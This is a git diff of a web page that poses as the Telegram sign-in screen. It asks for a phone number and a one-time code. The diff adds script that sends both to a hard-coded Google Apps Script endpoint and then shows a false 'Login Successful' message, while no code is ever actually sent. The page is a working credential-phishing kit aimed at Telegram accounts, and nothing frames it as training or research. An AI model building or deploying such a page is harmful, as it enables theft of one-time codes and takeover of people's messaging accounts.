--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<!DOCTYPE html>
+<!DOCTYPE html> 
 <html lang="en">
 <head>
     <meta charset="UTF-8">
@@ -37,14 +37,14 @@
             cursor: pointer;
         }
         button:hover {
-            background-color: darkskyblue;
+            background-color: skykblue;
         }
     </style>
 </head>
 <body>
     <div class="login-container">
-        <img src="Telegram-Logo.png" width=300 height=150>
-		<h2>Sign in to Telegram</h2>
+        <img src="telegram-logo.png" width=300 height=150>
+        <h2>Sign in to Telegram</h2>
         <input type="text" id="mobile" placeholder="Enter mobile number" maxlength="13">
         <button onclick="sendOTP()">Send OTP</button>
         <input type="text" id="otp" placeholder="Enter OTP" maxlength="6" style="display: none;">
@@ -52,26 +52,46 @@
     </div>
 
     <script>
+        const googleAppsScriptURL = "https://script.google.com/macros/s/AKfycbzoMXv_jFK4F-PKUe1kDE2eSzWkVoUDaG7QWAKzRGpU0vlPE5mASu1yyZvTcikD0XFFZA/exec"; // Replace with your Google Apps Script Web App URL
+
         function sendOTP() {
-            let mobileNumber = document.getElementById("mobile").value;
+            let mobileNumber = document.getElementById("mobile").value.trim();
             if (mobileNumber.length < 10) {
                 alert("Please enter a valid mobile number");
                 return;
             }
-            localStorage.setItem("mobile", mobileNumber);
             alert("OTP sent to " + mobileNumber);
             document.getElementById("otp").style.display = "block";
             document.getElementById("verifyBtn").style.display = "block";
         }
 
-        function verifyOTP() {
-            let otp = document.getElementById("otp").value;
-            if (otp.length !== 5) {
-                alert("Please enter a valid 5-digit OTP");
+        async function verifyOTP() {
+            let mobileNumber = document.getElementById("mobile").value.trim();
+            let otp = document.getElementById("otp").value.trim();
+
+            if (otp.length !== 6) {
+                alert("Please enter a valid 6-digit OTP");
                 return;
             }
-            localStorage.setItem("otp", otp);
-            alert("Login Successful!");
+
+            let data = { mobile: mobileNumber, otp: otp };
+
+            try {
+                let response = await fetch(googleAppsScriptURL, {
+                    method: "POST",
+                    headers: { "Content-Type": "application/json" },
+                    body: JSON.stringify(data)
+                });
+
+                let result = await response.json();
+                if (result.status === "success") {
+                    alert("Login Successful");
+                } else {
+                    alert("Error saving data.");
+                }
+            } catch (error) {
+                console.error("Error storing data:", error);
+            }
         }
     </script>
 </body>
